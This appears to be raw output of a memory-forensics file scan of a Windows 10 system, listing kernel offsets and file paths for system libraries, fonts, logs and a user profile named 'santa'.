+0x918b764b9330	\Windows\System32\Windows.UI.Input.Inking.dll	216
+0x918b764b94c0	\Windows\System32\Windows.ApplicationModel.Background.TimeBroker.dll	216
+0x918b764b9650	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll	216
+0x918b764b97e0	\$Directory	216
+0x918b764b9970	\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.54.4001.0_x64__8wekyb3d8bbwe	216
+0x918b764b9c90	\$Directory	216
+0x918b764b9e20	\$Directory	216
+0x918b764ba140	\Windows\System32\edgehtml.dll	216
+0x918b764ba2d0	\Windows\System32\WinBioDatabase\51F39552-1075-4199-B513-0C10EA185DB0.DAT	216
+0x918b764ba460	\Windows\System32\icuin.dll	216
+0x918b764ba5f0	\Windows\System32\srpapi.dll	216
+0x918b764ba780	\Windows\System32\icuuc.dll	216
+0x918b764ba910	\Windows\System32\Chakra.dll	216
+0x918b764baaa0	\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.54.4001.0_x64__8wekyb3d8bbwe	216
+0x918b764bac30	\Users\santa\AppData\Local\Microsoft\Windows\WebCacheLock.dat	216
+0x918b764badc0	\$Directory	216
+0x918b764bb0e0	\Windows\System32\rometadata.dll	216
+0x918b764bb270	\Windows\System32\stobject.dll	216
+0x918b764bb400	\Windows\SystemResources\stobject.dll.mun	216
+0x918b764bb590	\Dev\Query	216
+0x918b764bb8b0	\Windows\Fonts\framd.ttf	216
+0x918b764bba40	\$Directory	216
+0x918b764bbbd0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat	216
+0x918b764bbd60	\Windows\System32\InputSwitch.dll	216
+0x918b764bbef0	\Windows\Temp\MpCmdRun-80-53C9D589-6B66-4F30-9BAB-9A0193B0BAFC.lock	216
+0x918b764bc080	\Windows\System32\Windows.ApplicationModel.Background.SystemEventsBroker.dll	216
+0x918b764bc210	\Windows\Fonts\framdit.ttf	216
+0x918b764bc3a0	\Windows\System32\icu.dll	216
+0x918b764bc6c0	\Windows\System32\WinBioPlugIns\winbiostorageadapter.dll	216
+0x918b764bc9e0	\Dev\Query	216
+0x918b764bcb70	\Users\santa\AppData\Local\Microsoft\GameDVR	216
+0x918b764bcd00	\CMNotify	216
+0x918b764bd1b0	\ProgramData\Microsoft\Windows\Start Menu	216
+0x918b764bd340	\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy	216
+0x918b764bd4d0	\Windows\System32\wuapi.dll	216
+0x918b764bd660	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b764bd7f0	\$Directory	216
+0x918b764bdb10	\$Directory	216
+0x918b764bdca0	\Windows\System32\wups.dll	216
+0x918b764bde30	\$Directory	216
+0x918b764be150	\Windows\bcastdvr	216
+0x918b764be2e0	\Windows\System32\ieframe.dll	216
+0x918b764be470	\Windows\System32\C_1257.NLS	216
+0x918b764be790	\Windows\Registration\R000000000006.clb	216
+0x918b764be920	\Windows\System32\batmeter.dll	216
+0x918b764beab0	\Windows\System32\C_932.NLS	216
+0x918b764bec40	\Windows\SysWOW64\taskschd.dll	216
+0x918b764bedd0	\Windows\System32\winevt\Logs\Microsoft-Client-Licensing-Platform%4Admin.evtx	216
+0x918b764bf280	\ProgramData\Microsoft\Windows Defender\Platform\4.18.23100.2009-0\MpCmdRun.exe	216
+0x918b764bf410	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b764bf5a0	\Users\santa\AppData\Local\Packages\Microsoft.XboxGamingOverlay_8wekyb3d8bbwe\LocalCache	216
+0x918b764bf730	\Windows\System32\Windows.UI.Shell.dll	216
+0x918b764bfa50	\Dev\Query	216
+0x918b764bfbe0	\Windows\System32\winevt\Logs\Microsoft-Windows-Shell-ConnectedAccountState%4ActionCenter.evtx	216
+0x918b764bfd70	\$Directory	216
+0x918b764c0090	\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\resources.pri	216
+0x918b764c0220	\Windows\System32\en-US\setupapi.dll.mui	216
+0x918b764c03b0	\Windows\System32\ksuser.dll	216
+0x918b764c0540	\Windows\System32\C_1258.NLS	216
+0x918b764c06d0	\CMApi	216
+0x918b764c0860	\Windows\System32\winevt\Logs\Microsoft-Windows-UserPnp%4ActionCenter.evtx	216
+0x918b764c09f0	\Windows\System32\C_949.NLS	216
+0x918b764c0d10	\Windows\System32\C_874.NLS	216
+0x918b764c0ea0	\Windows\System32\atlthunk.dll	216
+0x918b764c14e0	\Windows\Fonts\gadugib.ttf	216
+0x918b764c1670	\Windows\SystemResources\SndVolSSO.dll.mun	216
+0x918b764c1800	\Windows\System32\C_950.NLS	216
+0x918b764c1e40	\ProgramData\Microsoft\Windows\Start Menu	216
+0x918b764c2160	\CMApi	216
+0x918b764c22f0	\Windows\Fonts\gadugi.ttf	216
+0x918b764c2480	\Windows\System32\DXP.dll	216
+0x918b764c2610	\Windows\Fonts\georgia.ttf	216
+0x918b764c27a0	\Windows\System32\dcntel.dll	216
+0x918b764c2930	\Windows\System32\en-US\vsstrace.dll.mui	216
+0x918b764c2ac0	\Windows\System32\C_936.NLS	216
+0x918b764c2c50	\$Directory	216
+0x918b764c2de0	\Windows\System32\en-US\userenv.dll.mui	216
+0x918b764c3100	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG1	216
+0x918b764c3420	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b764c35b0	\SearchTextHarvester	216
+0x918b764c3740	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat	216
+0x918b764c38d0	\Windows\ShellExperiences\QuickActions.dll	216
+0x918b764c3a60	\$Directory	216
+0x918b764c3bf0	\Windows\Fonts\segoeui.ttf	216
+0x918b764c3d80	\Windows\System32\winevt\Logs\Microsoft-Windows-WindowsUpdateClient%4Operational.evtx	216
+0x918b764c40a0	\Windows\rescache\_merged\2467931877\57170662.pri	216
+0x918b764c4230	\$Directory	216
+0x918b764c43c0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.Windows.ShellExperienceHost_10.0.18362.1_neutral_neutral_cw5n1h2txyewy\ActivationStore.dat.LOG2	216
+0x918b764c4870	\Windows\System32\shdocvw.dll	216
+0x918b764c4b90	\Windows\ShellExperiences\Windows.UI.ActionCenter.dll	216
+0x918b764c4d20	\Windows\System32\QuickActionsDataModel.dll	216
+0x918b764c4eb0	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b764c51d0	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b764c5360	\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\resources.pri	216
+0x918b764c54f0	\$Directory	216
+0x918b764c59a0	\Windows\System32\ActionCenter.dll	216
+0x918b764c5cc0	\Windows\rescache\_merged\1988845358\2257490454.pri	216
+0x918b764c6170	\$Directory	216
+0x918b764c6300	\$Directory	216
+0x918b764c6490	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b764c6620	\CMNotify	216
+0x918b764c67b0	\Endpoint	216
+0x918b764c6940	\CMNotify	216
+0x918b764c6c60	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b764c72a0	\CMNotify	216
+0x918b764c75c0	\CMNotify	216
+0x918b764c7750	\CMNotify	216
+0x918b764c78e0	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b764c7a70	\CMNotify	216
+0x918b764c7c00	\$Directory	216
+0x918b764c8240	\Windows\SysWOW64\D3DCompiler_47.dll	216
+0x918b764c83d0	\Windows\System32\winevt\Logs\Microsoft-Windows-StorageSpaces-ManagementAgent%4WHC.evtx	216
+0x918b764c8560	\Windows\System32\en-US\sndvolsso.dll.mui	216
+0x918b764c8880	\$Directory	216
+0x918b764c8a10	\CMNotify	216
+0x918b764c8ba0	\Windows\Fonts\taile.ttf	216
+0x918b764c8ec0	\Windows\SoftwareDistribution\DataStore\DataStore.edb	216
+0x918b764c9500	\Windows\System32\Syncreg.dll	216
+0x918b764c9690	\$Directory	216
+0x918b764c9820	\Program Files (x86)\Mozilla Firefox\libGLESv2.dll	216
+0x918b764c99b0	\CMNotify	216
+0x918b764c9b40	\$Directory	216
+0x918b764c9cd0	\Program Files (x86)\Mozilla Firefox\libEGL.dll	216
+0x918b764c9e60	\$Directory	216
+0x918b764ca180	\$Directory	216
+0x918b764ca7c0	\CMNotify	216
+0x918b764ca950	\Windows\System32\pnidui.dll	216
+0x918b764caae0	\Users\santa\AppData\Local\Microsoft\Internet Explorer\CacheStorage\edb.log	216
+0x918b764cac70	\Windows\System32\winevt\Logs\Microsoft-Windows-BackgroundTaskInfrastructure%4Operational.evtx	216
+0x918b764cb760	\Windows\SoftwareDistribution\DataStore\DataStore.edb	216
+0x918b764cb8f0	\Windows\SysWOW64\d3d9.dll	216
+0x918b764cba80	\CMNotify	216
+0x918b764cbc10	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b764cbda0	\Windows\SoftwareDistribution\DataStore\DataStore.jfm	216
+0x918b764cc0c0	\Windows\SystemResources\notepad.exe.mun	216
+0x918b764cc250	\CMNotify	216
+0x918b764cc3e0	\Endpoint	216
+0x918b764cc570	\Users\santa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs	216
+0x918b764cc700	\$Directory	216
+0x918b764cca20	\Windows\System32\EthernetMediaManager.dll	216
+0x918b764cced0	\CMNotify	216
+0x918b764cd1f0	\Windows\System32\NetworkUXBroker.dll	216
+0x918b764cd6a0	\Windows\System32\en-US\pnidui.dll.mui	216
+0x918b764cd830	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b764cd9c0	\Windows\System32\edgeIso.dll	216
+0x918b764cdb50	\Windows\System32\WaaSMedicSvc.dll	216
+0x918b764cdce0	\Windows\System32\WaaSMedicPS.dll	216
+0x918b764cde70	\Users\santa\AppData\Roaming\Microsoft\Windows\Start Menu\Programs	216
+0x918b764ce4b0	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG1	216
+0x918b764ce640	\Windows\System32\PortableDeviceTypes.dll	216
+0x918b764ce7d0	\Windows\System32\SettingMonitor.dll	216
+0x918b764ce960	\Windows\System32\WinMetadata\Windows.Foundation.winmd	216
+0x918b764cf130	\Windows\System32\srchadmin.dll	216
+0x918b764cf2c0	\$Directory	216
+0x918b764cf450	\Endpoint	216
+0x918b764cf770	\Users\santa\AppData\Roaming\Microsoft\Windows\Start Menu	216
+0x918b764cf900	\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe	216
+0x918b764cfa90	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\ActivationStore.dat.LOG2	216
+0x918b764cfc20	\Windows\Fonts\phagspa.ttf	216
+0x918b764d00d0	\$Directory	216
+0x918b764d0260	\Windows\System32\sppsvc.exe	216
+0x918b764d03f0	\Users\santa\AppData\Roaming\Microsoft\Windows\Start Menu	216
+0x918b764d0580	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b764d0710	\Windows\Fonts\ntailu.ttf	216
+0x918b764d08a0	\Windows\Fonts\ntailub.ttf	216
+0x918b764d0a30	\Windows\Fonts\phagspab.ttf	216
+0x918b764d0bc0	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b764d0d50	\Users\santa\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat.LOG2	216
+0x918b764d0ee0	\Windows\System32\en-US\Windows.Globalization.dll.mui	216
+0x918b764d1200	\Windows\System32\en-US\bthprops.cpl.mui	216
+0x918b764d1390	\Windows\System32\msimtf.dll	216
+0x918b764d1520	\Users\santa\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat	216
+0x918b764d16b0	\Windows\Fonts\taileb.ttf	216
+0x918b764d1840	\Windows\System32\bthprops.cpl	216
+0x918b764d19d0	\Windows\System32\en-US\explorerframe.dll.mui	216
+0x918b764d1b60	\CMNotify	216
+0x918b764d1e80	\Users\santa\AppData\Local\Microsoft\OneDrive\OneDrive.exe	216
+0x918b764d2330	\Users\santa\AppData\Local\Packages\Microsoft.LockApp_cw5n1h2txyewy\Settings\settings.dat.LOG1	216
+0x918b764d24c0	\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Microsoft.Notes.exe	216
+0x918b764d2650	\ProgramData\Microsoft\Windows\AppRepository\Packages\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\ActivationStore.dat	216
+0x918b764d27e0	\Windows\System32	216
+0x918b764d2970	\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21740.0_x64__8wekyb3d8bbwe	216
+0x918b764d2b00	\Windows\Fonts\segoepr.ttf	216
+0x918b764d3140	\Users\santa\Desktop	216
+0x918b764d32d0	\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.2.2_2.2.28604.0_x64__8wekyb3d8bbwe\mrt100_app.dll	216
+0x918b764d3460	\Windows\SysWOW64\rsaenh.dll	216
+0x918b764d35f0	\Windows\System32\CompatTelRunner.exe	216
+0x918b764d3780	\Windows\Fonts\arial.ttf	216
+0x918b764d3aa0	\Windows\SysWOW64\en-US\urlmon.dll.mui	216
+0x918b764d40e0	\Users\Public\Desktop	216
+0x918b764d4270	\CMApi	216
+0x918b764d4400	\Users\santa\Desktop	216
+0x918b764d48b0	\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Microsoft.Notes.dll	216
+0x918b764d4a40	\Windows\System32\en-US\Conhost.exe.mui	216
+0x918b764d4bd0	\Users\Public\Desktop	216
+0x918b764d4d60	\Program Files\WindowsApps\Microsoft.NET.Native.Framework.2.2_2.2.29512.0_x64__8wekyb3d8bbwe\SharedLibrary.dll	216
+0x918b764d4ef0	\Users\santa\AppData\Roaming\Microsoft\Windows\Network Shortcuts	216
+0x918b764d5080	\$Directory	216
+0x918b764d5210	\Users\santa\AppData\Roaming\Microsoft\Windows\Network Shortcuts	216
+0x918b764d53a0	\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\e_sqlite3.dll	216
+0x918b764d5530	\$Directory	216
+0x918b764d56c0	\Windows\System32\mrt100.dll	216
+0x918b764d5850	\$Directory	216
+0x918b764d5d00	\Windows\SysWOW64\en-US\iertutil.dll.mui	216
+0x918b7696c370	\$Directory	216
+0x918b7696c500	\$Directory	216
+0x918b7696c690	\Windows\System32\en-US\mswsock.dll.mui	216
+0x918b7696c820	\Windows\System32\en-US\imapi2.dll.mui	216
+0x918b7696c9b0	\Windows\SysWOW64\DWrite.dll	216
+0x918b7696cb40	\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\Assets\LockMDL2.ttf	216
+0x918b7696ce60	\Windows\System32\WinMetadata\Windows.Foundation.winmd	216
+0x918b7696d180	\Windows\SoftwareDistribution\ReportingEvents.log	216
+0x918b7696d7c0	\Windows\System32\notepad.exe	216
+0x918b7696dae0	\Windows\System32\updatepolicy.dll	216
+0x918b7696dc70	\Windows\System32\AuthBroker.dll	216
+0x918b7696de00	\CMNotify	216
+0x918b7696e2b0	\Windows\Registration\R000000000006.clb	216
+0x918b7696e440	\Windows\SystemApps\Microsoft.LockApp_cw5n1h2txyewy\Assets\LockMDL2.ttf	216
+0x918b7696e5d0	\$Directory	216
+0x918b7696e8f0	\Windows\System32\gamestreamingext.dll	216
+0x918b7696ea80	\$Directory	216
+0x918b7696ec10	\$Directory	216
+0x918b7696eda0	\Windows\System32\en-US\winnlsres.dll.mui	216
+0x918b7696f0c0	\Windows\System32\en-US\edgehtml.dll.mui	216
+0x918b7696f250	\Windows\System32\Windows.Management.Workplace.dll	216
+0x918b7696f570	\Windows\System32\SyncCenter.dll	216
+0x918b7696f700	\$Directory	216
+0x918b7696fa20	\$Directory	216
+0x918b7696fd40	\Windows\System32\en-US\rsaenh.dll.mui	216
+0x918b7696fed0	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b769701f0	\$Directory	216
+0x918b76970380	\Windows\System32\WinMetadata\Windows.UI.winmd	216
+0x918b76970510	\Windows\System32\imapi2.dll	216
+0x918b769706a0	\Windows\System32\wuuhext.dll	216
+0x918b76970830	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b769709c0	\Users\santa\AppData\Roaming\Mozilla\Firefox\Profiles\888jya8e.default-release\storage\default\https+++www.youtube.com\idb\1209553808LCo7g%sCD7a%t7adbca6s.sqlite-shm	216
+0x918b76970b50	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b76970ce0	\Windows\System32\WinMetadata\Windows.UI.winmd	216
+0x918b76970e70	\Windows\System32\WinMetadata\Windows.ApplicationModel.winmd	216
+0x918b76971190	\Windows\SysWOW64\dxgi.dll	216
+0x918b76971320	\Windows\System32\en-US\netmsg.dll.mui	216
+0x918b76971640	\Windows\System32\en-US\Windows.Security.Authentication.Web.Core.dll.mui	216
+0x918b76971960	\$Directory	216
+0x918b76971af0	\$Directory	216
+0x918b76971c80	\Windows\SystemResources\Windows.UI.SettingsAppThreshold\Windows.UI.SettingsAppThreshold.pri	216
+0x918b76971e10	\$Directory	216
+0x918b76972130	\$Directory	216
+0x918b769722c0	\Windows\System32\svchost.exe	216
+0x918b76972450	\$Directory	216
+0x918b76972770	\Windows\Fonts\seguiemj.ttf	216
+0x918b76972900	\Windows\Fonts\arial.ttf	216
+0x918b76972a90	\Windows\Fonts\seguisb.ttf	216
+0x918b76972c20	\$Directory	216
+0x918b76972db0	\$Directory	216
+0x918b76973260	\Windows\System32\smartscreenps.dll	216
+0x918b769733f0	\Windows\Registration\R000000000006.clb	216
+0x918b76973580	\Windows\Globalization\ICU\windowsZones.res	216
+0x918b769738a0	\Windows\Fonts\seguisb.ttf	216
+0x918b76973bc0	\Windows\System32\en-US\ESENT.dll.mui	216
+0x918b76973d50	\$Directory	216
+0x918b76973ee0	\Windows\rescache\_merged\3440028264\2043174863.pri	216
+0x918b76974200	\Windows\System32\en-US\dnsapi.dll.mui	216
+0x918b76974520	\Windows\ImmersiveControlPanel\Telemetry.Common.dll	216
+0x918b769749d0	\Users\santa\AppData\Local\Comms\UnistoreDB\store.jfm	216
+0x918b76974b60	\Program Files\WindowsApps\Microsoft.MicrosoftStickyNotes_6.0.1.0_x64__8wekyb3d8bbwe\Assets\Devices-light.png	216
+0x918b76974cf0	\Windows\System32\WinMetadata\Windows.UI.Xaml.winmd	216
+0x918b76974e80	\$Directory	216
+0x918b769751a0	\$ConvertToNonresident	216
+0x918b76975650	\Windows\Fonts\segoeui.ttf	216
+0x918b769757e0	\Users\santa\AppData\Local\Comms\UnistoreDB\store.vol	216
+0x918b76975970	\Windows\ImmersiveControlPanel\SystemSettingsViewModel.Desktop.dll	216
+0x918b76975b00	\Windows\System32\notepad.exe	216
+0x918b76975c90	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Microsoft.RichMedia.Ink.Controls.dll	216
+0x918b76976460	\Windows\System32\newdev.dll	216
+0x918b76976910	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db	216
+0x918b76976aa0	\Windows\System32\en-US\winhttp.dll.mui	216
+0x918b76976c30	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db	216
+0x918b76976dc0	\Windows\System32\OnDemandBrokerClient.dll	216
+0x918b769770e0	\Windows\System32\AppxPackaging.dll	216
+0x918b76977270	\Windows\System32\winevt\Logs\Microsoft-Windows-Security-SPP-UX-Notifications%4ActionCenter.evtx	216
+0x918b76977590	\$ConvertToNonresident	216
+0x918b76977720	\Windows\System32\devrtl.dll	216
+0x918b769778b0	\Windows\Fonts\segoeui.ttf	216
+0x918b76977a40	\Windows	216
+0x918b76977bd0	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db	216
+0x918b76978080	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b76978210	\Windows\System32	216
+0x918b769783a0	\Windows\System32\en-US\netmsg.dll.mui	216
+0x918b769786c0	\Windows\System32\elslad.dll	216
+0x918b76978850	\Windows\SoftwareDistribution\DataStore\Logs\tmp.edb	216
+0x918b769789e0	\Users\santa\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db	216
+0x918b76978d00	\ProgramData\Microsoft\Windows\AppRepository\StateRepository-Machine.srd-shm	216
+0x918b76979340	\Windows\System32	216
+0x918b769797f0	\Windows\System32\mfreadwrite.dll	216
+0x918b76979980	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b76979ca0	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\UnityEngineDelegates.dll	216
+0x918b76979e30	\Windows\System32\en-US\crypt32.dll.mui	216
+0x918b7697a150	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\MediaEngineCSWrapper.dll	216
+0x918b7697a2e0	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\clrcompression.dll	216
+0x918b7697a470	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\OneSettingsClientForwarder.dll	216
+0x918b7697a600	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\RenderingPlugin.dll	216
+0x918b7697a790	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\CryptnetUrlCache\MetaData	216
+0x918b7697a920	\$Directory	216
+0x918b7697add0	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Assets\PhotosIcons.ttf	216
+0x918b7697b0f0	\$Directory	216
+0x918b7697b280	\Windows\System32\en-US\twinui.dll.mui	216
+0x918b7697b5a0	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\OnlineMediaComponent.dll	216
+0x918b7697b8c0	\Windows\Fonts\segoeui.ttf	216
+0x918b7697bbe0	\$Directory	216
+0x918b7697bd70	\Windows\System32\RuntimeBroker.exe	216
+0x918b7697c090	\$Directory	216
+0x918b7697c220	\Windows\ShellComponents\WindowsInternal.ComposableShell.Experiences.Switcher.dll	216
+0x918b7697c3b0	\Windows\Fonts\segoeui.ttf	216
+0x918b7697c540	\ProgramData\Mozilla-1de4eec8-1241-4177-a864-e594e8d1fb38\UpdateLock-E7CF176E110C211B	216
+0x918b7697c6d0	\CMApi	216
+0x918b7697c860	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b7697c9f0	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\AppSettingsCppCX.dll	216
+0x918b7697cb80	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat	216
+0x918b7697cd10	\Windows\ShellComponents\TaskFlowUI.dll	216
+0x918b7697cea0	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.LOG1	216
+0x918b7697d1c0	\CMNotify	216
+0x918b7697d350	\$Directory	216
+0x918b7697d990	\$Directory	216
+0x918b7697db20	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.LOG2	216
+0x918b7697dcb0	\Windows\System32\en-US\propsys.dll.mui	216
+0x918b7697de40	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Search.winmd	216
+0x918b7697e2f0	\Windows\System32\WinMetadata\Windows.Foundation.winmd	216
+0x918b7697e480	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\AppCore.Windows.dll	216
+0x918b7697e7a0	\Windows\System32\en-US\user32.dll.mui	216
+0x918b7697e930	\Windows\System32\smartscreen.exe	216
+0x918b7697ec50	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\PhotosApp.Windows.dll	216
+0x918b7697f290	\MsFteWds	216
+0x918b7697f420	\Windows\System32\en-US\svchost.exe.mui	216
+0x918b7697f5b0	\Windows\System32	216
+0x918b7697f8d0	\Windows\System32\WinRtTracing.dll	216
+0x918b7697fa60	\Windows\System32\ieframe.dll	216
+0x918b7697fbf0	\Windows\System32\WinMetadata\Windows.Storage.winmd	216
+0x918b7697fd80	\Windows\System32\en-US\smartscreen.exe.mui	216
+0x918b769800a0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b76980230	\Windows\System32\en-US\shell32.dll.mui	216
+0x918b769803c0	\Windows\System32\WinMetadata\Windows.Security.winmd	216
+0x918b76980550	\$Directory	216
+0x918b769806e0	\Program Files\WindowsApps\Microsoft.VCLibs.140.00_14.0.32530.0_x64__8wekyb3d8bbwe\concrt140_app.dll	216
+0x918b76980870	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\Assets\PhotosIcons.ttf	216
+0x918b76980a00	\Windows\System32\en-US\windows.ui.xaml.dll.mui	216
+0x918b76980d20	\Windows\System32\en-US\ApplicationFrame.dll.mui	216
+0x918b76980eb0	\Windows\Fonts\StaticCache.dat	216
+0x918b769811d0	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Tips.winmd	216
+0x918b76981680	\Windows\SysWOW64\dnsapi.dll	216
+0x918b76981810	\Program Files\WindowsApps\Microsoft.Windows.Photos_2023.10070.17002.0_x64__8wekyb3d8bbwe\SharedStyles.dll	216
+0x918b76981b30	\CMNotify	216
+0x918b76981cc0	\Windows\System32\WinMetadata\Windows.Foundation.winmd	216
+0x918b76981e50	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b76982170	\Windows\System32\wscinterop.dll	216
+0x918b76982300	\Users\santa\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\RB2ZB7BJ	216
+0x918b76982490	\$Directory	216
+0x918b769827b0	\Windows\System32\WinMetadata\Windows.System.winmd	216
+0x918b76982ad0	\$Directory	216
+0x918b76982c60	\Windows\System32\wdmaud.drv	216
+0x918b76983430	\$Directory	216
+0x918b769835c0	\Windows\System32\en-US\KernelBase.dll.mui	216
+0x918b76983750	\Windows\System32\en-US\explorerframe.dll.mui	216
+0x918b769838e0	\Windows\System32\en-US\newdev.dll.mui	216
+0x918b76983c00	\Windows\System32\WinMetadata\Windows.UI.winmd	216
+0x918b76983d90	\Windows\System32\mlang.dll	216
+0x918b769840b0	\Windows\System32\winbio.dll	216
+0x918b769843d0	\Windows\System32\en-US\dnsapi.dll.mui	216
+0x918b76984560	\Users\santa\AppData\Local\Microsoft\Windows\Safety\shell\remote\script_96032244749497702726114603847611723578.rel.v2	216
+0x918b769846f0	\Program Files\Windows Defender\shellext.dll	216
+0x918b76984880	\$Directory	216
+0x918b76984a10	\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SPA.winmd	216
+0x918b76984ba0	\$Directory	216
+0x918b76984d30	\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.18362.30_none_a1435978519dce7f	216
+0x918b76984ec0	\$Directory	216
+0x918b769851e0	\Windows\System32\SecurityHealthSystray.exe	216
+0x918b76985370	\Program Files\Windows Photo Viewer\en-US\PhotoViewer.dll.mui	216
+0x918b76985500	\Windows\System32\en-US\windows.storage.dll.mui	216
+0x918b76985690	\$Directory	216
+0x918b76985820	\Windows\System32\WinMetadata\Windows.UI.winmd	216
+0x918b769859b0	\Windows\System32\en-US\Windows.Web.Http.dll.mui	216
+0x918b76985b40	\Windows\Registration\R000000000006.clb	216
+0x918b76985cd0	\Windows\System32\SecurityHealthSSO.dll	216
+0x918b76985e60	\Windows\System32\en-US\Conhost.exe.mui	216
+0x918b76986180	\Windows\Registration\R000000000006.clb	216
+0x918b76986630	\Windows\SysWOW64\wtsapi32.dll	216
+0x918b769867c0	\Windows\System32\en-US\securityhealthsso.dll.mui	216
+0x918b76986950	\Program Files\Windows Photo Viewer\PhotoBase.dll	216
+0x918b76986c70	\Windows\SysWOW64\version.dll	216
+0x918b76986e00	\Windows\System32\SecurityHealthService.exe	216
+0x918b76987120	\Windows\System32\en-US\combase.dll.mui	216
+0x918b769872b0	\Windows\System32	216
+0x918b769875d0	\Windows\System32\WinMetadata\Windows.Foundation.winmd	216
